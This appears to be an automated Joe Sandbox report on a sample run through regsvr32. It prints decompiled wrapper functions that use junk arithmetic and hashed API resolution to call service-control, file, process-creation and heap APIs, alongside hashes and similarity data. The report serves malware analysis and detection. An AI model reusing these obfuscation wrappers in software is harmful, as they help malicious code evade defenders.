                                                                                                                control_flow_graph 498 5732b5-57338a call 579e7d call 58bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E005732B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				short* _v24;
                                                                                                                				short* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t49;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				E00579E7D(_t49);
                                                                                                                				_v32 = 0xf329ca;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v16 = 0x2373b;
                                                                                                                				_t64 = 0x7a;
                                                                                                                				_v16 = _v16 * 0x75;
                                                                                                                				_t65 = 0x3d;
                                                                                                                				_v16 = _v16 / _t64;
                                                                                                                				_v16 = _v16 ^ 0x00061266;
                                                                                                                				_v12 = 0xb7be71;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 + 0xafdb;
                                                                                                                				_v12 = _v12 ^ 0x7920a4e8;
                                                                                                                				_v12 = _v12 ^ 0x79205c77;
                                                                                                                				_v8 = 0x1abc5;
                                                                                                                				_v8 = _v8 / _t65;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x07f89b39;
                                                                                                                				_v8 = _v8 ^ 0x07caeaee;
                                                                                                                				_v20 = 0x49b926;
                                                                                                                				_v20 = _v20 * 0x47;
                                                                                                                				_v20 = _v20 ^ 0x147483b3;
                                                                                                                				E0058BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
                                                                                                                				_t62 = OpenSCManagerW(0, 0, _a4); // executed
                                                                                                                				return _t62;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00573384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: efa3c49c50233b625944e6d736e117a47f5916646f2f77faa6e9945dbf2cfd64
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: A02112B5D01229FBDB04DFA9D84A9EEBFB9FB40304F208189E424A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 57c4eb-57c5c2 call 579e7d call 58bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0057C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t46;
                                                                                                                				void* _t54;
                                                                                                                				int _t58;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00579E7D(_t46);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v36 = 0xd40f1;
                                                                                                                				_v32 = 0xcb52a0;
                                                                                                                				_v28 = 0x146fa1;
                                                                                                                				_v20 = 0xb8dab7;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x0b80f677;
                                                                                                                				_v8 = 0x87dd92;
                                                                                                                				_v8 = _v8 + 0xffffe9d3;
                                                                                                                				_v8 = _v8 * 0x55;
                                                                                                                				_v8 = _v8 << 0xa;
                                                                                                                				_v8 = _v8 ^ 0x54d92ec5;
                                                                                                                				_v16 = 0xb88fea;
                                                                                                                				_v16 = _v16 | 0xf85cd4fd;
                                                                                                                				_v16 = _v16 + 0xed22;
                                                                                                                				_v16 = _v16 ^ 0xf8f0d6dc;
                                                                                                                				_v12 = 0x2c3d87;
                                                                                                                				_v12 = _v12 + 0x3690;
                                                                                                                				_v12 = _v12 + 0xfffff048;
                                                                                                                				_v12 = _v12 ^ 0x0029d00c;
                                                                                                                				E0058BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
                                                                                                                				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
                                                                                                                				return _t54;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0057C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 8950cf8539bfb95dce4c8ce1f55fe49f52ee6b904ebb6818c38a09e58e61bfb9
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 69211FB5C00209ABCF15DFA4D8499EEBBB4FF04318F108588E92566260E3B15B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 58a98e-58aa51 call 579e7d call 58bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0058A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t45;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E00579E7D(_t45);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v28 = 0xdfb18c;
                                                                                                                				_v12 = 0xac05d3;
                                                                                                                				_v12 = _v12 + 0xffffe692;
                                                                                                                				_t60 = 6;
                                                                                                                				_v12 = _v12 * 0xa;
                                                                                                                				_v12 = _v12 ^ 0x06b0bc77;
                                                                                                                				_v20 = 0xcbcea5;
                                                                                                                				_t61 = 0x73;
                                                                                                                				_v20 = _v20 / _t60;
                                                                                                                				_v20 = _v20 ^ 0x0026c0c8;
                                                                                                                				_v16 = 0x706a69;
                                                                                                                				_v16 = _v16 + 0xffff322e;
                                                                                                                				_v16 = _v16 ^ 0x006745ff;
                                                                                                                				_v8 = 0xc7f3e7;
                                                                                                                				_v8 = _v8 * 0x7b;
                                                                                                                				_v8 = _v8 + 0xffffee1e;
                                                                                                                				_v8 = _v8 / _t61;
                                                                                                                				_v8 = _v8 ^ 0x00d4d133;
                                                                                                                				E0058BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
                                                                                                                				_t58 = CloseServiceHandle(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0058AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: ddf27130f00d6a1603dcee4f4a5dbd5f6b31c1d9f103826ac8ff7f1b2a013b45
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: D12106B5D05209EBEF04DFA4D98A9AEBBB5BB40304F10C199E804AB260D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 57338b-573454 call 579e7d call 58bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0057338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t46;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E00579E7D(_t46);
                                                                                                                				_v28 = _v28 & 0x00000000;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v32 = 0x221b15;
                                                                                                                				_v20 = 0x156690;
                                                                                                                				_t60 = 5;
                                                                                                                				_v20 = _v20 * 0x69;
                                                                                                                				_v20 = _v20 ^ 0x08c90ac4;
                                                                                                                				_v12 = 0x1a8107;
                                                                                                                				_v12 = _v12 / _t60;
                                                                                                                				_v12 = _v12 | 0x5e0d12b3;
                                                                                                                				_v12 = _v12 * 0x36;
                                                                                                                				_v12 = _v12 ^ 0xd6d73012;
                                                                                                                				_v8 = 0x305b7c;
                                                                                                                				_v8 = _v8 + 0xffffaa6a;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 | 0xeac0b19d;
                                                                                                                				_v8 = _v8 ^ 0xeaf3a664;
                                                                                                                				_v16 = 0x5b8d10;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 + 0x95d4;
                                                                                                                				_v16 = _v16 ^ 0x258da45e;
                                                                                                                				E0058BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
                                                                                                                				_t58 = SHFileOperationW(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0057344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: 16b531a0d4962ec0cf4211fd867b60d5a68b35c3fb812dd698a8be5a9dca2ae6
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: BA2124B4D00209EFDF04DFA5C94AAAEBFB4FB40304F108189E424AA250D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0058E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t41;
                                                                                                                				int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E00579E7D(_t41);
                                                                                                                				_v20 = 0xc362e1;
                                                                                                                				_v20 = _v20 + 0xffff2419;
                                                                                                                				_v20 = _v20 + 0xffff15b9;
                                                                                                                				_v20 = _v20 ^ 0x00c90db5;
                                                                                                                				_v16 = 0x370fa8;
                                                                                                                				_v16 = _v16 + 0x3ddc;
                                                                                                                				_v16 = _v16 + 0xfffffca4;
                                                                                                                				_v16 = _v16 ^ 0x003af0ce;
                                                                                                                				_v8 = 0x58cda3;
                                                                                                                				_t53 = 0x37;
                                                                                                                				_v8 = _v8 / _t53;
                                                                                                                				_v8 = _v8 | 0xee3498e5;
                                                                                                                				_v8 = _v8 + 0xffff3fab;
                                                                                                                				_v8 = _v8 ^ 0xee3595ac;
                                                                                                                				_v12 = 0xe7384d;
                                                                                                                				_v12 = _v12 + 0x2a59;
                                                                                                                				_v12 = _v12 * 0x31;
                                                                                                                				_v12 = _v12 ^ 0x2c4bf561;
                                                                                                                				E0058BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
                                                                                                                				_t51 = CloseHandle(_t58); // executed
                                                                                                                				return _t51;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00583F2A,00000000), ref: 0058E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: 758038b5841a069c9b91c1f868b177de0c5f827a57154503018aa4abef853ea7
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: 1D1159B5D00209EFDF58DFA4C84989EBBB4EB40324F108299E824B62A0D7B55B059F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E005846E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t55;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				struct _PROCESS_INFORMATION* _t72;
                                                                                                                
                                                                                                                				_push(_a68);
                                                                                                                				_t72 = __edx;
                                                                                                                				_push(_a64);
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__edx);
                                                                                                                				E00579E7D(_t55);
                                                                                                                				_v8 = 0x728488;
                                                                                                                				_v8 = _v8 + 0x86b5;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 + 0xe7c2;
                                                                                                                				_v8 = _v8 ^ 0x98526b3c;
                                                                                                                				_v16 = 0xdd86ac;
                                                                                                                				_v16 = _v16 | 0x9093749e;
                                                                                                                				_v16 = _v16 + 0x773d;
                                                                                                                				_v16 = _v16 ^ 0x90e3102d;
                                                                                                                				_v20 = 0xa04379;
                                                                                                                				_v20 = _v20 + 0xe8c2;
                                                                                                                				_v20 = _v20 ^ 0x00a70f96;
                                                                                                                				_v12 = 0x20815c;
                                                                                                                				_t66 = 0x4c;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xbbf973da;
                                                                                                                				_v12 = _v12 ^ 0xbbf5b48f;
                                                                                                                				E0058BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
                                                                                                                				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
                                                                                                                				return _t64;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 005847CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: e0d9cf658f3cd2791bffab1c4af40da04a061c954fc76d3268d9b9ef87fa0e55
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 8131E372900248BBDF559F95DD09CDEBF79FB89314F008148FA2462120D7769A60EB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0058BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t47;
                                                                                                                				void* _t55;
                                                                                                                				long _t60;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00579E7D(_t47);
                                                                                                                				_v20 = 0x8eb723;
                                                                                                                				_v20 = _v20 + 0xdb15;
                                                                                                                				_v20 = _v20 ^ 0x00852a30;
                                                                                                                				_v16 = 0x113147;
                                                                                                                				_v16 = _v16 >> 0xc;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 ^ 0x0008263d;
                                                                                                                				_v12 = 0x276480;
                                                                                                                				_v12 = _v12 + 0x6f6f;
                                                                                                                				_v12 = _v12 | 0x7ba60f09;
                                                                                                                				_v12 = _v12 * 0x1e;
                                                                                                                				_v12 = _v12 ^ 0x7da9aca6;
                                                                                                                				_v8 = 0x62f42b;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 3;
                                                                                                                				_v8 = _v8 ^ 0x000dc6a5;
                                                                                                                				E0058BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
                                                                                                                				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
                                                                                                                				return _t55;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0058BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 4f2f753ea4d406c5ab6abc17e4d2f63624f0a4d52acce23623ad243ac977a079
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 4421E57680020DBBCF15DF96D9498DFBFB5FB84748F108198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00581B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t44;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t62;
                                                                                                                				long _t63;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t62 = __edx;
                                                                                                                				_t63 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00579E7D(_t44);
                                                                                                                				_v12 = 0x22ab7;
                                                                                                                				_t57 = 0x25;
                                                                                                                				_v12 = _v12 * 0x37;
                                                                                                                				_v12 = _v12 / _t57;
                                                                                                                				_v12 = _v12 + 0xd1d9;
                                                                                                                				_v12 = _v12 ^ 0x00090b04;
                                                                                                                				_v16 = 0xc8cc57;
                                                                                                                				_v16 = _v16 >> 0x10;
                                                                                                                				_v16 = _v16 + 0xffff2520;
                                                                                                                				_v16 = _v16 ^ 0xfffe92e9;
                                                                                                                				_v20 = 0xc52a4b;
                                                                                                                				_v20 = _v20 | 0xae757bf4;
                                                                                                                				_v20 = _v20 ^ 0xaef18991;
                                                                                                                				_v8 = 0xf15120;
                                                                                                                				_v8 = _v8 ^ 0xeebb54a4;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 ^ 0xf39e7cda;
                                                                                                                				E0058BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
                                                                                                                				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
                                                                                                                				return _t55;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00581BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: cd86edd998d56f6c13e6ac4fe4f3a7788533af28c728f756d10db61017d9a264
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: A82132B5D00208FBDF05DFA5C94A8EEBFB5FB80314F108089E914A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E005866C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __edx;
                                                                                                                				E00579E7D(_t39);
                                                                                                                				_v12 = 0xe2acc8;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 + 0xbe17;
                                                                                                                				_v12 = _v12 ^ 0x0011993b;
                                                                                                                				_v20 = 0xf2f568;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xbd5142c5;
                                                                                                                				_v8 = 0x6d1128;
                                                                                                                				_v8 = _v8 + 0xffff2279;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 << 0xc;
                                                                                                                				_v8 = _v8 ^ 0x19de445b;
                                                                                                                				_v16 = 0xb26540;
                                                                                                                				_v16 = _v16 + 0xffff3889;
                                                                                                                				_v16 = _v16 ^ 0x00b459c6;
                                                                                                                				_t45 = E0058BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
                                                                                                                				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
                                                                                                                				return _t46;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00586777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
